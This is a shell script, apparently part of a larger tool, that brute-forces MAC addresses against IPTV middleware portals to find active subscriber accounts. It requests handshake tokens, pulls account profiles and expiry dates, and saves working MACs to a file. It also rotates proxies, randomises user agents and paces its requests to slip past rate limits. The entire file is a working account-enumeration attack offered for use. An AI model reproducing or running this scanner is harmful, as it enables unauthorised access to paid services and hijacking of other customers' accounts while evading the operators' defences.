#!/bin/sh

check_if_time_to_stop() {
	if [[ -n ${stopping} && $item -eq $stopping ]]; then
		if ! [[ -n ${only_outputs_mac} ]]; then
			echo "${_BOLD}${_CYAN}$valid_macs_number valid out of $item MACs.${_RESET}"
		fi
		exit 0
	fi
}

check_if_timebreak() {
	if [[ ${timebreak} -ne 0 && $(expr $(( $item )) % $timebreak ) == 0 ]]; then
		if [[ -z ${only_outputs_mac+x} ]]; then
			echo -ne ${_BLUE}"\r[$item] $mac ${_RESET}${_DIM}${_CYAN}--- Pausing for $timebreak_duration seconds..."${_RESET}
		fi
		sleep $timebreak_duration
	else
		sleep $request_delay
	fi
}


handshake_token_is_empty() {
	if [[ $handshake_token = "" || $(echo $handshake_token | grep null) ]]; then
		if ! [[ -n ${only_outputs_mac} ]]; then
			echo -ne "${_ERASE}$@${_YELLOW}[$item]${_RESET} ${_RED}$mac ${_RESET}"
		fi
		return 0
	fi
	return 1
}

#profile_is_empty() {
#}

check_if_timeout_limit() {
	#if [[ -z "${proxy_from_file+x}" && $consecutive_timeout_number -ge $consecutive_timeout_limit ]]; then
	if [[ -z "${proxy_from_file+x}" ]]; then
		if [[ $consecutive_timeout_number -ge $consecutive_timeout_limit && \
			$consecutive_timeout_limit ]]; then
			echo -e "${_ERASE}${_YELLOW}Limit of consecutive timeouts allowed reached [$consecutive_timeout_number].${_RESET}" #TODO
			exit 1
		elif [[ $total_timeout_number -ge $total_timeout_limit &&\
			$total_timeout_limit -ne 0 ]]; then
			echo -e "${_ERASE}${_YELLOW}Limit of total timeouts allowed reached [$total_timeout_number].${_RESET}" #TODO
			exit 1
		fi
	fi
}

last_request_failed() {
	unset mac_not_changed
	#if [[ -n "${proxy_from_file}" && $consecutive_timeout_number -ge $consecutive_timeout_limit ]]; then
	if [[ -n "${proxy_from_file}" ]]; then
		if [[ $consecutive_timeout_number -ge $consecutive_timeout_limit && \
			$consecutive_timeout_limit -ne 0 ]]; then
			update_proxy
			consecutive_timeout_number=0
			total_timeout_number=0
		elif [[ $total_timeout_number -ge $total_timeout_limit && \
			$total_timeout_limit -ne 0 ]]; then
			update_proxy
			consecutive_timeout_number=0
			total_timeout_number=0
		fi
	fi
}

request_is_a_timeout() {
	consecutive_timeout_number=$(( $consecutive_timeout_number + 1 ))
	total_timeout_number=$(( $total_timeout_number + 1 ))
	#last_request_timedout=true
	mac_not_changed=true
	check_if_timeout_limit
	if ! [[ -n ${only_outputs_mac} ]]; then
		echo -ne "${_ERASE}${_BLUE}Timeout [$total_timeout_number] (consecutive:$consecutive_timeout_number). New attempt in $timebreak_duration seconds.${_RESET}"
	fi
	sleep $timebreak_duration
	if ! [[ -n ${only_outputs_mac} ]]; then
		echo -ne "${_ERASE}${_ERASE}${_BLUE}New attempt...${_RESET}"
	fi
}

check_curl_exit_code() {
	# Function that returns 1 if curl failed, else 0
	curl_exit=$?
	if [ $curl_exit -eq 28 ]; then
		request_is_a_timeout
		return 1
	elif [ $curl_exit -eq 5 ]; then
		echo -e "\t${_DIM}curl could not resolve proxy.${_RESET}" # TODO
		mac_not_changed=true
		consecutive_timeout_number=$consecutive_timeout_limit
		total_timeout_number=$total_timeout_limit
		return 1
	elif [ $curl_exit -ne 0 ]; then
		echo -e "\t${_DIM}curl exit code : $curl_exit.${_RESET}" #TODO
		mac_not_changed=true
		consecutive_timeout_number=$consecutive_timeout_limit
		total_timeout_number=$total_timeout_limit
		return 1
	fi
	return 0
}

get_handshake() {
	handshake_url=$(echo $dns)'/portal.php?action=handshake&type=stb&token=&mac='$(echo $encoded_mac)
	cookie="mac=$mac; stb_lang=en; timezone=Europe/Amsterdam; "
	random_user_agent

	handshake_token=$(curl $debug_verbose_curl $proxy_user_option $proxy_url_option --max-time $timeout -s -X GET -H "Accept: */*" -H "User-Agent: $(echo $user_agent)" -H "Cookie: $(echo $cookie)" "$(echo $handshake_url)"); if ! check_curl_exit_code; then return 1; fi

	if [[ -n ${debug} ]]; then
		echo -e "\n---------------------------------\n\t${_YELLOW}Handshake token : ${_RESET}${_BLUE}${handshake_token:-Empty}${_RESET}"
	fi

	if [[ $(echo "$handshake_token" | grep -Eio "error code|unauthorized|502 bad gateway|maximum number of open connections reached|just a moment|500 internal server error|error") ]]; then
		#echo "contains error"
		mac_not_changed=true
		return 1
	fi

	handshake_token=$(echo $handshake_token| grep -o '"token".*' | sed 's/\"token\":// ; s/\}\}//')

	if handshake_token_is_empty; then
		return 1
	fi
}

get_profile() {
	authorization='Bearer '$(echo $handshake_token)
	profile_url=$(echo $dns)'/portal.php?type=account_info&action=get_main_info&mac='$(echo $mac)
	profile=$(curl $debug_verbose_curl $proxy_user_option $proxy_url_option --max-time $timeout -s -X GET -H "Accept: */*" -H "User-Agent: $(echo $user_agent)" -H "Authorization: $(echo $authorization)" -H "Cookie: $(echo $cookie)" "$(echo $profile_url)"); if ! check_curl_exit_code; then return 1; fi

	if [[ $profile == "" ]]; then
		maybeGEN1portal=true
		profile_url=$(echo $dns)'/portal.php?type=stb&action=get_profile&JsHttpRequest=1-xml='$(echo $mac)
		profile=$(curl $debug_verbose_curl $proxy_user_option $proxy_url_option --max-time $timeout -s -X GET -H "Accept: */*" -H "User-Agent: $(echo $user_agent)" -H "Authorization: $(echo $authorization)" -H "Cookie: $(echo $cookie)" "$(echo $profile_url)"); if ! check_curl_exit_code; then return 1; fi
	fi

	if [[ $profile == "" ]]; then
		unset maybeGEN1portal
		if ! [[ -n ${only_outputs_mac} ]]; then
			echo -ne "${_ERASE}$@${_YELLOW}[$item]${_RESET} ${_RED}$mac ${_RESET}"
		fi
		return 1 # test
	fi

	if [[ -z ${maybeGEN1portal+x} ]]; then
		account_url=$(echo $dns)'/portal.php?type=account_info&action=get_main_info&mac='$(echo $mac)
		account=$(curl $debug_verbose_curl $proxy_user_option $proxy_url_option --max-time $timeout -s -X GET -H "Accept: */*" -H "User-Agent: $(echo $user_agent)" -H "Authorization: $(echo $authorization)" -H "Cookie: $(echo $cookie)" "$(echo $account_url)"); if [ $? -eq 28 ]; then request_is_a_timeout && return; fi
		if ! [[ $account == "" ]]; then
			if [[ -n ${debug} ]]; then
				echo -e "${_YELLOW}ACCOUNT : ${_RESET}${_BLUE}${account}${_RESET}"
				echo -e "${_YELLOW}PROFILE1 : ${_RESET}${_BLUE}${profile}${_RESET}"
			fi
			profile=$account
		fi
	fi

	if [[ -n ${debug} ]]; then
		echo -e "${_YELLOW}PROFILE2 : ${_RESET}${_BLUE}${profile}${_RESET}"
	fi
}

get_exp_date() {
	expiration_date=$(echo $profile | grep -o "\"phone\":\".*\"" | sed 's/\"phone\":\"//' | sed 's/\".*//')

	if [[ -n ${debug} ]]; then
		echo -e "${_YELLOW}EXP_DATE : ${_RESET}${_BLUE}${expiration_date}${_RESET}"
	fi

	if [[ -z ${expiration_date} && -z ${keep_expired+x} ]]; then
		if ! [[ -n ${only_outputs_mac} ]]; then
			echo -ne "\r${_YELLOW}[$item]${_RESET} ${_BOLD}${_RED}$mac [expired] ${_RESET}"
		fi
		return 1
	fi

	if [[ -z ${expiration_date} && -n ${keep_expired} ]]; then
		if ! [[ -n ${only_outputs_mac} ]]; then
			echo -ne "\r${_YELLOW}[$item]${_RESET} ${_BOLD}${_RED}$mac [expired] ${_RESET}\n"
		fi
		if [[ $valid_macs_number == 0 ]]; then
			echo -e "\n$dns ($(date))\n" >> $destination/valid_macs_$name
		fi
		echo "$mac [expired]" >> $destination/valid_macs_$name
		return 1
	fi
}

scanning() {
	if [[ -n ${mac_not_changed} ]]; then
		last_request_failed
	else
		consecutive_timeout_number=0
		if ! [[ $item == 0 ]]; then
			check_if_time_to_stop
			check_if_timebreak
		fi
		item=$(( $item + 1 ))
		generate_mac
	fi

	if ! get_handshake; then return; fi
	if ! get_profile; then return; fi
	if ! get_exp_date; then return; fi

	valid_mac_found
	unset maybeGEN1portal
}
